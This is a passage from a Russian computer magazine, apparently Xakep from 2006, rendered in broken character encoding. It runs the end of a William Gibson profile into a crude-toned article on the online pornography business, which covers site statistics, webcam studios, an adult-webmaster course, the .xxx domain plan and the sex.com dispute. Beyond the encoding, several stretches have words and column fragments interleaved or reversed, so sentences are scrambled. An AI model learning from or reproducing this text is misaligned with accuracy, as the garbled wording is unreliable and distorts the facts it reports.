îñòàíîâèòü.  1999 ãîäó âûøåë òðåòèé ðîìàí ñåðèè «Âñå âå÷åðèíêè çàâòðàøíåãî äíÿ».  íåì ÷èòàòåëü ñíîâà âñòðå÷àåò ãåðîåâ èç ïåðâûõ äâóõ ÷àñòåé: êîïà Áýððè, âèðòóàëüíóþ çâåçäó Ðýé Òîýé, ×åâåòò. Íî öåíòðîâûì ïåðñîíàæåì áóäåò ïàðåíü ïî èìåíè Êîëèí. Íåñìîòðÿ íà òî, ÷òî îí æèâåò â êîðîáêå èç-ïîä ïåðôîêàðò, Êîëèí ñïîñîáåí ïîâëèÿòü íà âåñü ìèð.  äåòñòâå íàä íèì ïðîâåëè ýêñïåðèìåíò ñ ìàëîèññëåäîâàííûì íàðêîòèêîì 5-SB, â ðåçóëüòàòå ÷åãî ó ïàðíÿ âûðàáîòàëàñü ñïîñîáíîñòü îïðåäåëÿòü «íîäîâûå ïåðåõîäû» â íåîáúÿòíûõ ìàññèâàõ ñåòåé. Ýòî äîâîëüíî ðåäêèå ÿâëåíèÿ, âî âðåìÿ êîòîðûõ ïðîèñõîäèò ÷òî-òî î÷åíü âàæíîå äëÿ âñåãî ìèðà. Êîëèí ÷óâñòâóåò, ÷òî ñëåäóþùèé ïåðåõîä ïðîèçîéäåò î÷åíü ñêîðî, íî íå çíàåò, ÷åì ýòî ìîæåò îáåðíóòüñÿ. Âìåñòå ñî ñòàðûìè ãåðîÿìè, åìó ïðåäñòîèò ýòî âûÿñíèòü, à òàêæå ïîìåøàòü ìîãóùåñòâåííîìó ìèëëèàðäåðó âîñïîëüçîâàòüñÿ ñèòóàöèåé äëÿ ïîëó÷åíèÿ íåîãðàíè÷åííîé âëàñòè. ÌÅÐÒ ËÈ ÊÈÁÅÐÏÀÍÊ? Ïîñëåäíåé ðàáîòîé Óèëüÿìà Ãèáñîíà ñòàë ðîìàí «Ðàñïîçíîâàíèå ïàòòåðíà», ïîÿâèâøèéñÿ â ïðîäàæå 2 ãîäà íàçàä. Ýòî ïåðâàÿ êíèãà ïèñàòåëÿ, ãäå ñîáûòèÿ ïðîèñõîäÿò â íàøè äíè.  îòëè÷èå îò äðóãèõ ïðîèçâåäåíèé, ðàññêàç çäåñü âåäåòñÿ îò ëèöà ãëàâíîãî ãåðîÿ — ïðîôåññèîíàëüíîãî ñëåäîâàòåëÿ-ïðåäñêàçàòåëÿ Êåéñè Ïîëëàðä.  Ëîíäîíå, ãäå îíà ðàáîòàåò, Êåéñè ïîëó÷àåò âûãîäíîå ïðåäëîæåíèå ðàññëåäîâàòü ïðè÷èíó è èñòî÷íèê ïîÿâëåíèÿ â Èíòåðíåòå ôðàãìåíòîâ âèäåî, îò êîòîðîãî ôàíàòåþò òûñÿ÷è ëþäåé. Ðàáîòîäàòåëè ñ÷èòàþò, ÷òî ãåíèàëüíîñòü àâòîðà ýòèõ âèäåîçàñòàâîê ìîæåò ïðèíåñòè èì ìèëëèîíû. Íî êîãäà Êåéñè ïðèáëèæàåòñÿ ê ðàçãàäêå, åå íà÷èíàþò ïðåñëåäîâàòü. Íåèçâåñòíûå âëàìûâàþòñÿ â åå êâàðòèðó, ïðîíèêàþò â åå êîìïüþòåð... Ïûòàÿñü íàéòè îòâåòû íà ñâîè âîïðîñû, Êåéñè îòïðàâëÿåòñÿ ñíà÷àëà â Òîêèî, çàòåì â Ðîññèþ, è âìåñòå ñ òàéíîé êèíîôðàãìåíòîâ óçíàåò êîå-÷òî íîâîå îá èñ÷åçíîâåíèè ñâîåãî îòöà. Ñàìî ñîáîé, êèíîøíèêè íå ìîãëè íå çàìåòèòü óñïåõà êíèã Ãèáñîíà è ïåðèîäè÷åñêè ïûòàëèñü ýêðàíèçèðîâàòü åãî ïðîèçâåäåíèÿ. Íî íè îäíà èç ýòèõ ïîïûòîê íå áûëà óäà÷íîé. Ïåðâûì ïå÷àëüíûì îïûòîì áûëî ïðèãëàøåíèå Óèëüÿìà íàïèñàòü ñöåíàðèé ê ôèëüìó «×óæîé 3». Íî òàê êàê ïèñàòåëü íå ìûñëèë êèíåìàòîãðàôè÷åñêèìè ìåðêàìè, åãî òåêñò ïðèõîäèëîñü ïîñòîÿííî ïðàâèòü, èçìåíÿòü, äîïîëíÿòü, è â èòîãå âîîáùå îòêàçàëèñü îò åãî óñëóã.  1995 ãîäó ðåæèññåð Ðîáåðò Ëîíãî ïðèñòóïèë ê ñîçäàíèþ ôèëüìà ïî ìîòèâàì

088

èí «êèáåðïÃèáñîí âïåðâûå èñïîëüçîâàë òåðì «Ñîææåíèå ðîñòðàíñòâî» â ñâîåì ðàññêàçå ñëîâî ïðî÷íî Õðîì». ×åðåç íåñêîëüêî ëåò ýòî íåå ñ ðàñïðîâîøëî â îáèõîä è ñòàëî åùå ïîïóëÿð ñòðàíåíèåì êîìïüþòåðîâ. àë, ÷òî åùå  íà÷àëå 80-õ, Óèëüÿì Ãèáñîí ñ÷èò ïîëíîöåííîãî íå ãîòîâ ïðèñòóïèòü ê íàïèñàíèþ åãî òîëüêî ëåò ðîìàíà. Äóìàë, ÷òî ñìîæåò îñèëèòü åãî, õî÷åò ëè ë îñè ñïð ÷åðåç 8. Íî êîãäà èçäàòåëü . Êîíòðàêò «äà» îí íàïèñàòü êíèãó, Ãèáñîí îòâåòèë áûë çàêëþ÷åí â òîò æå äåíü. àë 2/3 òåêñòà Ïèñàòåëü íåñêîëüêî ðàç ïåðåïèñûâ ïîëíîå ïðåäñ«Íåéðîìàíòà», ïîêà íå ñîñòàâèë îêîí÷àòåëüáûë òàâëåíèå î ìèðå è ñîáûòèÿõ, è íå íî óäîâëåòâîðåí ðåçóëüòàòîì. ê Ãèáñîíó, Èäåÿ êèáåðïðîñòðàíñòâà ïðèøëà à àðêàäíóþ âèêîãäà îí óâèäåë â âèòðèíå ìàãàçèí äåëå ìîæåò îì äåîèãðó è ïðåäñòàâèë, ÷òî íà ñàì ïðîèñõîäèòü ïî òó ñòîðîíó ýêðàíà. üÿìà ÃèáñîÁîëüøîå âëèÿíèå íà òâîð÷åñòâî Óèë Òîìàñ Ïèí÷åí, íà îêàçàë àìåðèêàíñêèé ïèñàòåëü íûìè ñþæåèçâåñòíûé ñâîèìè çàïóòàííûìè, ñëîæ àëîé ýðóäèöèè òàìè, òðåáóþùèìè îò ÷èòàòåëÿ íåì àâèòàöèîííàÿ è çíàíèÿ ðàçëè÷íûõ íàóê. À åãî «Ãð Ãèáñîíà. ðàäóãà» ÿâëÿåòñÿ ëþáèìîé êíèãîé òü ñåáå êóÄîëãîå âðåìÿ Ãèáñîí íå ìîã ïîçâîëè èçâåäåíèÿ íà ïèòü êîìïüþòåð è ïèñàë ñâîè ïðî mes 2000. ñòàðåíüêîé ïèøóùåé ìàøèíêå Her íèÿ, îí äàæå ßïî — ÿ Ëþáèìàÿ ñòðàíà ïèñàòåë ïî÷åðïíóòü û ñïåöèàëüíî ïîñåùàë Òîêèî, ÷òîá àíîâ. âäîõíîâåíèå äëÿ ñâîèõ áóäóùèõ ðîì êíèãè Óèëüÿìà Ãèáñîíà

êíèãè «Äæîííè Ìíåìîíèê». Ñöåíàðèé ê íåìó ïèñàë ñàì Ãèáñîí. Íî â ïðîêàòå êàðòèíà ïðîâàëèëàñü, õîòü è ïîëó÷èëà ïðèçíàíèå ó êîìïüþòåðíîé ìîëîäåæè. Òà æå ñóäüáà æäàëà ôèëüì «Îòåëü ''Íîâàÿ Ðîçà''», â îñíîâó êîòîðîãî ëåãëè øïèîíñêèå ñîáûòèÿ èç ðàííåãî ðàññêàçà ïèñàòåëÿ (õîòÿ ñþæåò áûë ñèëüíî âèäîèçìåíåí). Êîíå÷íî, ëîãè÷íåå âñåãî áûëî áû îæèäàòü ôèëüìà «Íåéðîìàíò», òàê êàê ýòà ïîâåñòü áûëà ñàìîé ïîïóëÿðíîé è óñïåøíîé ó àâòîðà. Íî åäèíñòâåííàÿ êîìïàíèÿ, âûêóïèâøàÿ ïðàâà íà ýêðàíèçàöèþ, âñêîðå îáàíêðîòèëàñü. Òàêæå ñþæåòû êíèã Ãèáñîíà íåîäíîêðàòíî íàõîäèëè ïðèìåíåíèå â êîìïüþòåðíûõ èãðàõ.  1988 ãîäó êîìïàíèÿ Interplay ïðåäñòàâèëà action-RPG «Íåéðîìàíò» äëÿ ïëàòôîðì Apple II, C64, Amiga è PC, â êîòîðîé èãðîê äîëæåí âçëàìûâàòü ðàçíûå ñèñòåìû è óëó÷øàòü ñâîè ïîêàçàòåëè (èìïëàíòû). Ìíîãèå ñ÷èòàþò, ÷òî ñ Ãèáñîíîì êèáåðïàíê ðîäèëñÿ, ñ íèì æå è ïî÷èë. Òàêîãî âîîäóøåâëåíèÿ, äðàéâà íåò â ïðîèçâåäåíèÿõ äðóãèõ êèáåðïàíê-ïèñàòåëåé. Ìíîãèå ïûòàëèñü êîïèðîâàòü Ãèáñîíà, íî íè÷åãî õîðîøåãî èç ýòîãî íå âûøëî. Íåñìîòðÿ íà îãðîìíóþ ïîïóëÿðíîñòü, ëè÷íàÿ æèçíü Óèëüÿìà Ãèáñîíà ìàëîèçâåñòíà. Îí íå ðàññêàçûâàåò î ñâîåé ñåìüå è óâëå÷åíèÿõ â èíòåðâüþ, îãðàíè÷èâàÿñü ëèøü ñâîèì òâîð÷åñòâîì. Òåì íå ìåíåå ó Ãèáñîíà åñòü ñâîé îôèöèàëüíûé ñàéò www.williamgibsonbooks.com, ãäå ìîæíî íàéòè âåá-áëîã ïèñàòåëÿ, â êîòîðîì îí äåëèòñÿ ñâîèìè ìûñëÿìè è èäåÿìè. Ïîêëîííèêè æäóò åãî íîâûõ êíèã, õîòÿ ñàì Ãèáñîí çàâåðèë, ÷òî âòîðîãî «Íåéðîìàíòà» íå áóäåò. «Êèáåðïàíê ìåðòâ êàê ëèòåðàòóðíûé æàíð. Íî ÿ âèæó â íåäàëåêîì áóäóùåì âñå òî, î ÷åì ïèñàë 20 ëåò íàçàä». BINARY YOUR’S z

XÀÊÅÐ 01 /85/ 06


ÑÖÅÍÀ ÂÇËÎÌ ÑÖÅÍÀ ///// ISSUE

TEXT ÈËÜß ÀËÅÊÑÀÍÄÐÎÂ / ilya_al@rambler.ru /

ÎÁÍÀÆÅÍÍÛÉ ÈÍÒÅÐÍÅÒ Î ÆÈÇÍÈ ÑÅÒÅÂÎÉ ÏÎÐÍÎÈÍÄÓÑÒÐÈÈ

ÊÀÊÈÅ ÑÀÉÒÛ ÒÛ ÏÎÑÅÙÀÅØÜ ×ÀÙÅ ÂÑÅÃÎ? ÊÒÎ-ÒÎ ÏÐÈ ÝÒÎÌ ÂÎÏÐÎÑÅ “ ÍÀ×ÍÅÒ ÁÎÐÌÎÒÀÒÜ ÏÐÎ ÏÎÈÑÊÎÂÛÅ ÌÀØÈÍÛ, ÊÒÎ-ÒÎ — ÏÐÎ SECURITY-ÏÎÐÒÀËÛ, ÄÐÓÃÈÅ ÏÐÎÑÒÎ ÑÌÓÙÅÍÍÎ ÎÏÓÑÒßÒ ÃËÀÇÀ. ËÀÄÍÎ ÒÅÁÅ, ÀÌÈÃÎ, ÂÑÅ ÑÂÎÈ. ÍÈÊÒÎ ÍÅ ÁÓÄÅÒ ÎÑÓÆÄÀÒÜ ÒÅÁß ÇÀ ÏÐÎÃÓËÊÈ ÏÎ ÑÀÉÒÀÌ ÕÕÕ ÒÅÌÀÒÈÊÈ È ÇÀ ÏÐÎÑÌÎÒÐ ÂÑßÊÈÕ ÈÇÂÐÀÙÅÍÈÉ. ÓÂÅÐÅÍ, ÒÛ ÓÆÅ ÍÀ ÝÒÎÌ ÑÎÁÀÊÓ ÑÚÅË. ÍÎ ÊÎÅ-×ÒÎ

ÍÎÂÅÍÜÊÎÅ ÏÐÎ ÏÎÐÍÎÈÍÄÓÑÒÐÈÞ ß ÒÅÁÅ ÂÑÅ ÆÅ ÐÀÑÑÊÀÆÓ ÑÒÀÒÈÑÒÈÊÀ ÇÍÀÅÒ ÂÑÅ Óæå íèêòî íå âñïîìíèò, êîãäà â Ñåòè áûë ñîçäàí ïåðâûé ïîðíîðåñóðñ. Ïîíÿòèÿ «Èíòåðíåò» è «ïîðíî» â îáùåñòâåííîì ñîçíàíèè òåñíî ñâÿçàíû ìåæäó ñîáîé, è òàêîå îùóùåíèå, ÷òî âñå ýòè êàðòèíêè è âèäåîðîëèêè ïîÿâèëèñü â ãëîáàëüíîé ïàóòèíå äàæå ðàíüøå, ÷åì WWW. Íà ñåãîäíÿøíèé äåíü â êèáåðïðîñòðàíñòâå ñóùåñòâóåò ïîðÿäêà 4,6 ìèëëèîíîâ ñàéòîâ «äëÿ âçðîñëûõ» (ïîñåùàþò èõ, ïðàâäà, áîëüøåé ÷àñòüþ äåòèøêè). Ñïðîñ ðîæäàåò ïðåäëîæåíèå — ïðèìåðíî 15% ïîëüçîâàòåëåé ðåãóëÿðíî ïîñåùàþò ïîðíîïîðòàëû. Ýòî åñëè âåðèòü àìåðèêàíñêèì ñîöèîëîãàì, íà ñàìîì äåëå — íà ïîðÿäîê áîëüøå. Íåäàâíî ÿ çàáðåë íà hitwise.com, ýòà êîíòîðà çàíèìàåòñÿ èññëåäîâàíèåì èíòåðåñîâ âåá-ñåðôåðîâ. Òàê âîò, â íîÿáðå ïðîøëîãî ãîäà óñëóãàìè ïîðíîñàéòîâ ïîëüçîâàëèñü 19% îò âñåõ þçåðîâ, âûõîäèâøèõ â web. Òîãäà êàê îáùàÿ äîëÿ òðåõ âåäóùèõ ïîèñêîâèêîâ google, yahoo, MSN ñîñòàâèëà 5,5%. Ãîëûå òåòêè â 3 ðàçà ïîïóëÿðíåé äÿäþøêè ãóãëÿ! Åùå èíòåðåñíî ïîñìîòðåòü, â êàêèõ ñòðàíàõ ïîðíóøêà íàèáîëåå âîñòðåáîâàíà. Áîëüøå âñåãî ðàçâðàòíûõ ñòðàíè÷åê â Ãåðìàíèè (â çîíå .de èõ 1 ìèëëèîí), íà âòîðîì ìåñòå áðèòàíöû — â äîìåííîé çîíå .uk 800 òûñÿ÷ ïîðíîðåñóðñîâ. Íàøà ìîãó÷àÿ äåðæàâà óæå äàâíî íå âïåðåäè âñåé Ïëàíåòû, äàæå ïî êîëè÷åñòâó ýäàëò-ïîðòàëîâ. Ñåäüìîå ìåñòî è ñòî òûñÿ÷ ñàéòîâ. Âïðî÷åì, öèôðû ïîñòîÿííî ðàñòóò.  íàäåæäå íà áîëüøèå áàáêè, ïîðíîáàðîíû ïî âñåìó ìèðó åæåäíåâíî íàïîëíÿþò ñåòü äâóìÿ ñîòíÿìè ñàéòîâ ñ ïîðåâîì. Óòîìèë òåáÿ ñòàòèñòè÷åñêèìè äàííûìè? Ýòî âñå äëÿ òîãî, ÷òîá òû ïîíÿë èñòèííûå ìàñøòàáû ïîðíîèíäóñòðèè. ×ÒÎ È ÃÄÅ? Êîíòåíò ýäàëò-ïðîåêòîâ â áîëüøèíñòâå ñâîåì íàâåâàåò ñêóêó. Îäíîòèïíûå ãàëåðåè, ñôàáðèêîâàííûå ôîòîøîïîì ôîòîãðàôèè ãîëûõ çâåçä… Áîëüøèíñòâî ñàéòîâ ðàáîòàåò ïî ïðèíöèïó ïëàòíîãî äîñòóïà ê ñîäåðæèìîìó. Ñíà÷àëà ïîëüçîâàòåëÿ çàìàíèâàþò íà ñàéò, ïîêàçûâàþò îòêðîâåííûå ôîòîãðàôèè, ïîñëå ÷åãî ïðåäëàãàþò çàïëàòèòü n-íóþ ñóììó äåíåã çà ïðîñìîòð îñòàëüíîãî êîíòåíòà. Ýòîò ñïîñîá ïîíÿòåí è áåçóìíî ïðîñò â ðåàëèçàöèè. Òîëüêî ñðóáèòü áàáëà òàêèì ìàêàðîì ñ êàæäûì äíåì âñå òðóäíåå: âîïåðâûõ, áåñïðåöåäåíòíîå êîëè÷åñòâî êîíêóðåíòîâ, âî-âòîðûõ, ëþáóþ ýðîòèêó þçåð ìîæåò íàéòè íà áåñïëàòíûõ ñàéòàõ.

090

Òîãäà ïîðíîáàðîíû íàøëè íîâûé, ãîðàçäî áîëåå âûãîäíûé ñïîñîá ïîëó÷åíèÿ ïðèáûëè îò èíòåðíåò-ïîðíîãðàôèè — LiveCam, î êîòîðîì ïèñàëè â òâîåì ëþáèìîì æóðíàëå â èþíå 2004 ãîäà. Íàïîìíþ, î ÷åì èäåò ðå÷ü. Áåðóò äåâî÷åê-ìîäåëåé, çàïèõèâàþò èõ â ýðîòè÷åñêè îáñòàâëåííóþ êîìíàòó, ïîêóïàþò êîìïû è âåá-êàìåðû. Çàõîäÿ íà ñàéò ëàéâêýì-ñòóäèè, êëèåíò ñíà÷àëà îáùàåòñÿ ñ ìîäåëüþ (èëè ñ àäìèíîì, ïî ñîâìåñòèòåëüñòâó âûïîëíÿþùèì îáÿçàííîñòè îïåðàòîðà) â îáû÷íîì òåêñòîâûì ÷àòå, ðàçóìååòñÿ, áåñïëàòíî. Ïîñëå ÷åãî êëèåíòó ïðåäëàãàþò ïîñìîòðåòü âèäåî. Åñëè îí ñîãëàøàåòñÿ, íà ýêðàíå ìîíèòîðà ïîÿâëÿåòñÿ òà ñàìàÿ ìîäåëü, äåéñòâèÿìè êîòîðîé ìîæíî óïðàâëÿòü. Ìîæíî ïðèêàçàòü òåòêå ðàçäåòüñÿ, ïîìàñòóðáèðîâàòü… íå çíàþ, ÷òî òàì åùå ïðèäåò â ãîëîâó ñðåäíåñòàòèñòè÷åñêîìó ñåòåâîìó çàäðîòó. Çðåëèùå ýòî íå èç äåøåâûõ: îò äâóõ äî ïÿòè áàêñîâ çà ìèíóòó «îáùåíèÿ». Äåíüãè íà ýòîì äåëå ðóáÿò ñóìàñøåäøèå. Äà è êîíêóðåíöèè ãîðàçäî ìåíüøå: îðãàíèçîâàòü ñòóäèþ, íàéòè ìîäåëåé, çàêóïèòüñÿ àïïàðàòóðîé — âñå ýòî òðåáóåò îãðîìíûõ äåíåæíûõ è âðåìåííûõ çàòðàò. Åùå ìîæíî âñïîìíèòü ïðîäàæó äèñêîâ ñ ïîðíîôèëüìàìè. Âîò, ïîæàëóé, è âñå âèäû adult-ïðîäóêöèè. Íî ãäå ýòîé ïðîäóêöèè òîëüêî íåò. Ïîðíî òåïåðü äàæå â WAP. Íà 2005 ãîä 12 ñàìûõ ïîïóëÿðíûõ ðåñóðñîâ «Ìîáèëüíîãî Èíòåðíåòà» áûëè ÕÕÕ-íàïðàâëåííîñòè. Ôàêòè÷åñêè, ïîðíîñàéòû — åäèíñòâåííîå, ÷åì èíòåðåñåí þçåðàì WAP. Êðîìå íèõ, ïîñåùàþòñÿ ðàçâå ÷òî ïîðòàëû ñ ïîëèôîíè÷åñêèìè ìåëîäèÿìè, íî èõ ðåéòèíãè — íè÷òî â ñðàâíåíèè ñ ïîðíóøíûìè. Íàðîä íå ñìóùàåò äàæå êðîøå÷íîå è íå âñåãäà êà÷åñòâåííîå èçîáðàæåíèå äèñïëååâ ñîòîâûõ òåëåôîíîâ.  ýòîé îáëàñòè óæå ïîÿâèëèñü ñâîè ïîðíîáàðîíû. Ñàìûé èçâåñòíûé èç íèõ — Ïàòðèê ÌàêÀäàì, âëàäåëåö áîëåå ñîòíè WAP-ñàéòîâ, ïðèíîñÿùèõ, ïî åãî óòâåðæäåíèþ, áîëüøå ïðèáûëè, ÷åì îñíîâíàÿ äîëæíîñòü — ðóêîâîäñòâî ÈÒ-ïîäðàçäåëåíèåì êðóïíîé êîìïàíèè. Ïîìèìî web-ðåñóðñîâ, îãðîìíûå çàëåæè ïîðíî íàõîäÿòñÿ â IRC, UseNet, ïèðèíãîâûõ ñåòÿõ. Ñàìàÿ ïîïóëÿðíàÿ èåðàðõèÿ — alt.sex — íàñ÷èòûâàåò áîëåå 453 êîíôåðåíöèé, òðàôèê â êîòîðûõ ïðîñòî íå ïîääàåòñÿ èñ÷èñëåíèþ. Åñòü äàæå ñïåöèàëüíûå ïðîãðàììû, ïîçâîëÿþùèå îïòèìèçèðîâàòü ïðîöåññ ñêà÷èâàíèÿ ýäàëòà èç UseNet. Íàïðèìåð, çíàìåíèòûé Picture Sucker, IRC è p2p ìåíåå ïîïóëÿðíû ñðåäè ëþáèòåëåé ïîðíóøêè, çàòî, êàê óâåðèëè ìåíÿ íåêîòîðûå òîâàðèùè, ñàìûé ñâåæàê íàõîäèòñÿ èìåííî òàì, è óæå îòòóäà ïîñòóïàåò â web.

XÀÊÅÐ 01 /85/ 06


ÏÎÐÍÎÌÀÍÛ Ó×ÅÍÛÅ ÑÒÎËÊÍÓËÈÑÜ Ñ ÍÎÂÎÉ ÁÎËÅÇÍÜÞ — ÏÎÐÍÎÌÀÍÈÅÉ. ÏÎ ÓÒÂÅÐÆÄÅÍÈÞ ÏÐÎÔÅÑÑÎÐÀ ÄÆÅÉÌÑÀ ÎÃËÎÔÀ ÈÇ ÀÌÅÐÈÊÀÍÑÊÎÃÎ ÓÍÈÂÅÐÑÈÒÅÒÀ ÌÎÍÀØÀ, ÊÎËÈ×ÅÑÒÂÎ ÒÀÊÈÕ ÁÎËÜÍÛÕ ÍÅÂÅËÈÊÎ, ÍÎ ÏÎÑÒÎßÍÍÎ ÐÀÑÒÅÒ. ÏÎÐÍÎÌÀÍÛ ÇÀÁÈÂÀÞÒ ÍÀ ÂÑÅ: ÑÅÌÜÞ, ÄÅÒÅÉ, ÐÀÁÎÒÓ, È ÇÀÖÈÊËÈÂÀÞÒÑß ÒÎËÜÊÎ ÍÀ ÎÄÍÎÌ — ÏÐÎÑÌÎÒÐÅ ÏÎÐÍÎÃÐÀÔÈÈ. ÑÎÖÈÎËÎÃÈ Ñ×ÈÒÀÞÒ, ×ÒÎ ÏÐÈ×ÈÍÀ ÝÒÎÃÎ Â ÒÎÌ, ×ÒÎ Â ÏÎÐÍÎÔÈËÜÌÀÕ ÆÅÍÙÈÍÀ ÂÑÅÃÄÀ ÃÎÒÎÂÀ Ê ÑÅÊÑÓ, ÍÈÊÎÃÄÀ ÍÅ ÊÐÈÒÈÊÓÅÒ ÏÀÐÒÍÅÐÀ, ×ÒÎ ÇÍÀ×ÈÒÅËÜÍÎ ÏÎÂÛØÀÅÒ ÌÓÆÑÊÓÞ ÑÀÌÎÎÖÅÍÊÓ. ÕÎÒß ÌÍÅ ÊÀÆÅÒÑß, ×ÒÎ ÏÑÈÕÈ×ÅÑÊÈ ÍÅÓÐÀÂÍÎÂÅØÅÍÍÛÉ ×ÅËÎÂÅÊ Ñ ÏÐÎÁËÅÌÀÌÈ Â ÆÈÇÍÈ ÌÎÆÅÒ ÓÄÀÐÈÒÜÑß ÕÎÒÜ Â ÏÎÐÍÎÃÐÀÔÈÞ, ÕÎÒÜ Â ÊÎÌÏÜÞÒÅÐÍÛÅ ÈÃÐÛ, ÕÎÒÜ Â ÏÎÏÛÒÊÈ ÑÂÅÑÒÈ Ñ×ÅÒÛ Ñ ÆÈÇÍÜÞ. ÏÐÎÁËÅÌÀ ÍÅ Â ÏÎÐÍÎÑÀÉÒÀÕ, ÏÐÎÁËÅÌÀ  ÌÎÇÃÀÕ, À ÒÎ×ÍÅÅ Â ÈÕ ÎÒÑÓÒÑÒÂÈÈ Ó ÍÅÊÎÒÎÐÛÕ ËÞÄÅÉ.

XÀÊÅÐ 01 /85/ 06

091


CÖÅÍÀ ///// ISSUE

õîñòèíã äëÿ Adult-ïðîåêòîâ — cyberage.com

ADULTWEBMASTERING SCHOOL Òû óæå çíàåøü, ÷òî íà ïîðíî ìîæíî ïðåêðàñíî çàðàáîòàòü. Ìàéêë Õàéåñ èç AdultWebmasterSchool.com âñåãî çà 140 âå÷íîçåëåíûõ ïðåçèäåíòîâ ðàññêàæåò òåáå âñå, ÷òî íóæíî äëÿ óñïåøíîé êàðüåðû ïîðíîîëèãàðõà. Îòêðûòûå Ìàéêëîì â 2000 ãîäó êóðñû óæå çàêîí÷èëî 2200 ÷åëîâåê. Êàê óòâåðæäàåò ñàì Õàéåñ, äëÿ ïðîõîæäåíèÿ îáó÷åíèÿ íå íóæíî íèêàêîãî îïûòà. Íà ñàéòå ðàçìåùåíû âèäåîóðîêè òèïà íàøèõ âèçóàë-õàêîâ, òîëüêî òàì îðóäóþò íå õàêåðû, à ïîðíîìàñòåðà. Õàéåñ äîëãîå âðåìÿ ðàáîòàë íà îäèí âåá-ïîðòàë, íî êîãäà ñàéò çàêðûëè, ïåðåä íèì âñòàëà ñåðüåçíàÿ ïðîáëåìà: êàê çàðàáàòûâàòü íà æèçíü.  êàêîé-òî ìîìåíò áåçðàáîòíîìó äèçàéíåðó ïðèøëà â ãîëîâó ìûñëü, ÷òî ïðè îãðîìíîé ïîïóëÿðíîñòè ïîðíîñàéòîâ, íèêòî íå äîäóìàëñÿ ïîñòàâèòü îáó÷åíèå AdultWebMasterèíãó íà êîììåð÷åñêóþ îñíîâó. Íå èñêëþ÷åíî, ÷òî Ìàéêë Õàéåñ ÷åðåç ïàðó ëåò îòêðîåò ïåðâóþ â èñòîðèè øêîëó êèëëåðîâ èëè êóðñû íà÷èíàþùèõ ïóòàí. Âïðî÷åì, ÷òîáû ñòàòü âëàäåëüöåì ñâîåãî ïîðíîðåñóðñà, íèêàêèõ îñîáûõ çíàíèé íå íóæíî. Ê òâîèì óñëóãàì è áåñïëàòíûå õîñòèíãè (äîñòàòî÷íî íàçâàòü highporno.com), è áèëëèíãîâûå ñèñòåìû, è øàáëîíû äëÿ ñîçäàíèÿ ïîðòàëà... Çàêîí? Îá ýòîé ñòîðîíå âîïðîñà ìû åùå ïîãîâîðèì. Äëÿ íà÷àëà ïðèâåäó â ïðèìåð òàêóþ ëè÷íîñòü, êàê Ñåðãåé Ïðÿíèøíèêîâ. Èçâåñòíûé ðóññêèé ïîðíîðåæèññåð, âëàäåëåö sexvideo.ru, ôîðìà äëÿ ïîñòèíãà ñîîáùåíèé íà www.linuxsucks.org

áèëëèíãîâàÿ ñèñòåìà ibill.com — äðóã êàæäîãî ïîðíîäèëåðà

Îðãàíèçàöèÿ óïðàâëåíèÿ äîìåííûì ïðîñòØêîëà ðàíñòâîì Èíòåðíåòà (ñîêðàùåííî — ïîðíîãðàôîâ. ICANN) ðåøèëà ñîçäàòü äîìåííóþ çîíó .xxõ, Adultwebmasterschool.com ïðåäíàçíà÷åííóþ ñïåöèàëüíî äëÿ ýäàëòñàéòîâ. Íîâàÿ çîíà ïîçâîëèò ôèëüòðàì íå äîïóñêàòü ê ýðîòèêå íåñîâåðøåííîëåòíèõ, âåäü çàñóíóòü â ÷åðíûé ñïèñîê âñþ äîìåííóþ çîíó êóäà ïðîùå, ÷åì èñêàòü ðåñóðñû, ðàçáðîñàííûå ïî âñåì çîíàì Ñåòè. Ñåé÷àñ îðãàíèçàöèÿ ðåøàåò, êàêîâà áóäåò ñòîèìîñòü ðåãèñòðàöèè â çîíå (ïðåäïîëîæèòåëüíî îíà ñîñòàâèò 75 äîëëàðîâ) è êàêèå áóäóò íàêëàäûâàòüñÿ îãðàíè÷åíèÿ íà êîíòåíò. Òîëüêî íå ïîíÿòíî, êàê îíè ñîáèðàþòñÿ çàñòàâèòü ïîðíîáàðîíîâ ïåðåòàùèòü ñâîè ðàñêðó÷åííûå ðåñóðñû íà íîâûé äîìåí è õîñòèíã è ëèøèòüñÿ íåìàëîãî êîëè÷åñòâà àóäèòîðèè èç-çà ïîñòàâëåííûõ çàáîòëèâûìè ðîäèòåëÿìè ôèëüòðîâ. Òû, íàâåðíî, ñëûøàë ïðî ðàçáèðàòåëüñòâà èç-çà äîìåíà sex.com. Åùå â 1994 ãîäó àìåðèêàíñêèé ïðåäïðèíèìàòåëü Ãýðè Êðèìåí çàðåãèñòðèðîâàë åãî íà ñâîå èìÿ, íî ÷åðåç ãîä íåêòî Ñòèâåí Êîýí îáìàííûì ïóòåì ïðèñâîèë ïîðòàë ñåáå. Îí ïðåäñòàâèëñÿ ñîòðóäíèêîì êîìïàíèè Êðèìåíà, ñîîáùèâ, ÷òî âëàäåëåö ðåøèë îòêàçàòüñÿ îò èñïîëüçîâàíèÿ äîìåíà.  òå÷åíèå ñëåäóþùèõ 5 ëåò Êîýí ñäåëàë sex.com îäíèì èç ñàìûõ ïîïóëÿðíûõ ðåñóðñîâ Èíòåðíåòà ñ ïîñåùàåìîñòüþ 25 ìèëëèîíîâ ÷åëîâåê â äåíü. Êðèìåí, âèäÿ òàêîå äåëî, ïîäàë íà øóñòðîãî Êîýíà â ñóä, íî ïåðâîå äåëî ïðîèãðàë, òàê êàê «âåá-ñàéò íå ÿâëÿåòñÿ ñîáñòâåííîñòüþ, à ïîòîìó óêðàñòü åãî íåâîçìîæ-

Å×ÍÎÇÅËÅÍÛÕ ÏÐÅÇÈRSCHOOL.COM ÂÑÅÃÎ ÇÀ 140  E T S A M B E W T L U D A Ç È Ñ Å É À Õ Ë ÈÃÀÐÕÀ. ÌÀÉÊ ÑÏÅØÍÎÉ ÊÀÐÜÅÐÛ ÏÎÐÍÎÎË Ó ß Ë Ä Î Í Æ Ó Í Î Ò × , Å Ñ Â Å Á Å Ò Ò ÄÅÍÒΠÐÀÑÑÊÀÆÅ ãäå ïðîäàþòñÿ adult-ôèëüìû. Âñå âûøåïåðå÷èñëåííîå íå ïîìåøàëî åìó áàëëîòèðîâàòüñÿ íà ïîñò Ãóáåðíàòîðà Ñàíêò-Ïåòåðáóðãà, è åãî ñàéò, ðàñïîëîæåííûé íà îáû÷íîì ðóññêîì õîñòèíãå, íèêòî çàêðûâàòü íå òîðîïèòñÿ. Òàì äàæå íàïèñàíî, ÷òî âñå ñîäåðæèìîå ìîæíî ñ÷èòàòü ýðîòèêîé, à îòëè÷àòü ýðîòèêó îò ïîðíóõè íàøå çàêîíîäàòåëüñòâî ïîêà íå â ñîñòîÿíèè. 